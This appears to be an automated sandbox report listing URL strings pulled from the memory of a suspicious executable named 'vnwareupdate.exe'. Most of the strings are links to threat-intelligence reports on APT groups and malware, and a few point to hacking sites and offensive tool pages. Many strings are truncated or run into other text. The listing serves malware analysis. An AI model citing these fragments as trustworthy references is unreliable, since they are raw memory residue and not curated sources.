Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/charmingkitten/Full
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/copykitten-jpost/
Source: vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/dustysky/
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/dustysky/APTnotes
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/dustysky/Anunak:
Source: vnwareupdate.exe, 00000003.00000003.237309639.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/dustysky/Operation
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campai
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/greenbug/
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/greenbug/Iranian
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/greenbug/New
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/greenbug/TIranian
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/iec/#att123
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/iec/#att123Operation
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/ismagent/
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/ismagent/EquationDrug
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/ismagent/Recent
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/0219;APTnotes
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/0LeetMX
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/44b8ee7fc2c9;APTnotes
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/8
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/8p
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/A
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/F
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/LeetMX
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/N
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/Operation
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/T
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/The
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/Y
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/df
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/f
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/nShark-MaudiOperation.pdf
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/notes
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/leetmx/s
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/oilrig/Digging
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/oilrig/Iranian
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/oilrig/Malware
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/oilrig/The
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/tulip
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/winnti/
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/winnti/8
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/winnti/Floki
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/winnti/Recent
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/winnti/Tofsee
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.201
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.201ABLOID_EXTRAt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.201Syrian
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.201The
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf?x
Source: vnwareupdate.exe, 00000003.00000002.530925888.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdfIranian
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdfRCHER
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdfck
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnhonker.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnhonker.net============
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cnhonker.net=============
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/miniduke/miniduke_indicators_public.pdf
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfGathering
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfMiniduke
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfNebula
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/miniduke/miniduke_indicators_public.pdfRegin
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/turlaepiccc/turla_epic_cc_v1.pdf
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.crysys.hu/turlaepiccc/turla_epic_cc_v1.pdfEpic
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyintanalysis.com/threat-analysis-poison-ivy-and-links-to-an-extended
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/aggressive-malware-pushers-prolific-cyber-surfers-beware/
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/aggressive-malware-pushers-prolific-cyber-surfers-beware/(
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/koreatimes-installs-venik/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/koreatimes-installs-venik/Infected
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/koreatimes-installs-venik/Kraken
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti-tMultiple
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti/s
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-insti:/Multiple
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-instienMultiple
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-instiewMultiple
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-instifaMultiple
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/multiple-malwares-used-to-target-an-asian-financial-instiwaMultiple
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/psychcental-com-infected-with-angler-ek-installs-bedep-va
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/psychcental-com-infected-with-angler-ek-installs-bedep-vaAndroid.Bankosy:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.cyphort.com/psychcental-com-infected-with-angler-ek-installs-bedep-vaAngler
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.dyamar.com.
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmck
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmck8
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmck8p
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckCombating
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckCommunities
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckDirt
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckNew
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckRATs
Source: vnwareupdate.exe, 00000003.00000002.559056371.0000000003EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckThe
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.europarl.europa.eu/meetdocs/2014_2019/documents/droi/dv/420_speechmckan
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.eyuyan.com)
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1016_Pushdo.pdf
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1016_Pushdo.pdfDisrupting
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1016_Pushdo.pdfPushdo
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1016_Pushdo.pdfSakula
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1016_Pushdo.pdfiPushdo
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1017_Phishing_in_Plain_Si
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1017_Phishing_in_Plain_Si.secureworks.com/cyb
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1017_Phishing_in_Plain_SiAttack
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.fidelissecurity.com/sites/default/files/FTA_1017_Phishing_in_Plain_SiFidelis
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.fireeye.com/blog/threat-research/2016/03/stop_scanning_mymac.html
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: http://www.fireeye.com/blog/threat-research/2016/04/new_downloader_forl.html?mkt
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.fireeye.com/blog/threat-research/2016/04/new_downloader_forl.html?mktNew
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.fireeye.com/blog/threat-research/2016/04/new_downloader_forl.html?mktWinnti
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://www.fireeye.com/blog/threat-research/2016/04/new_downloader_forl.html?mktkNew
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.foundstone.com
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: http://www.freebuf.com/vuls/142970.html
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.freebuf.com/vuls/142970.htmlFurther
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.freebuf.com/vuls/142970.htmlPincav
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://www.freebuf.com/vuls/142970.htmlVENOM
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://www.fsec.or.kr/common/proc/fsec/bbs/21/fileDownLoad/1235.do
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.co.jp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/bot.html)
Source: vnwareupdate.exe, 00000003.00000003.234392495.00000000060B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234268201.0000000006033000.00000004.00000001.sdmp	String found in binary or memory: http://www.govcert.admin.ch/blog/5/e-banking-trojan-retefe-still-spreading-in-sw
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.govcert.admin.ch/blog/5/e-banking-trojan-retefe-still-spreading-in-swTargeted
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://www.govcert.admin.ch/blog/5/e-banking-trojan-retefe-still-spreading-in-swe-Banking
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.greyhathacker.net/?p=738
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.hackdos.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.hackp.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.happysec.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.hkmjj.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.i0day.com/1.txt
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: http://www.infosecisland.com/blogview/23567-Vietnamese-Malware-Gets-Very-Persona
Source: vnwareupdate.exe, 00000003.00000003.232758250.0000000005F33000.00000004.00000001.sdmp	String found in binary or memory: http://www.intelsecurity.com/advanced-threat-research/content/Analysis_SamSa_Ran
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/another-distraction-new-version-north-korean-ransomware-h24A
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/another-distraction-new-version-north-korean-ransomware-hCs
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/Lazarus
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/Lucky
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/New
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/Trojanized
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/blockbusted-lazarus-blockbuster-north-korea/Vawtrak
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/eternalminer-copycats/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.intezer.com/new-variants-of-agent-btz-comrat-found/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip138.com/ip2city.asp
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242880867.0000000003BE7000.00000004.00000001.sdmp	String found in binary or memory: http://www.isightpartners.com/2014/10/cve-2014-4114/
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.isightpartners.com/2014/10/cve-2014-4114/Roki
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://www.isightpartners.com/2015/06/hawkeye-keylogger-campaigns-affect-multipl
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-le
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-leKhaan
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.israirairlines.com/?mode=page&page=14635&lang=eng
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.jmicron.co.tw0
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.ht
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.ht8
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.ht8P%
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.htDridex
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.htNetTraveler
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.htSpearphishing
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://www.jpcert.or.jp/magazine/acreport-ChChes.htTargeted
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&amp
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3671
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4327
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&ampThe
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&ampWin32/Spy.Obator
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1465
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=14658
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1465Citadel
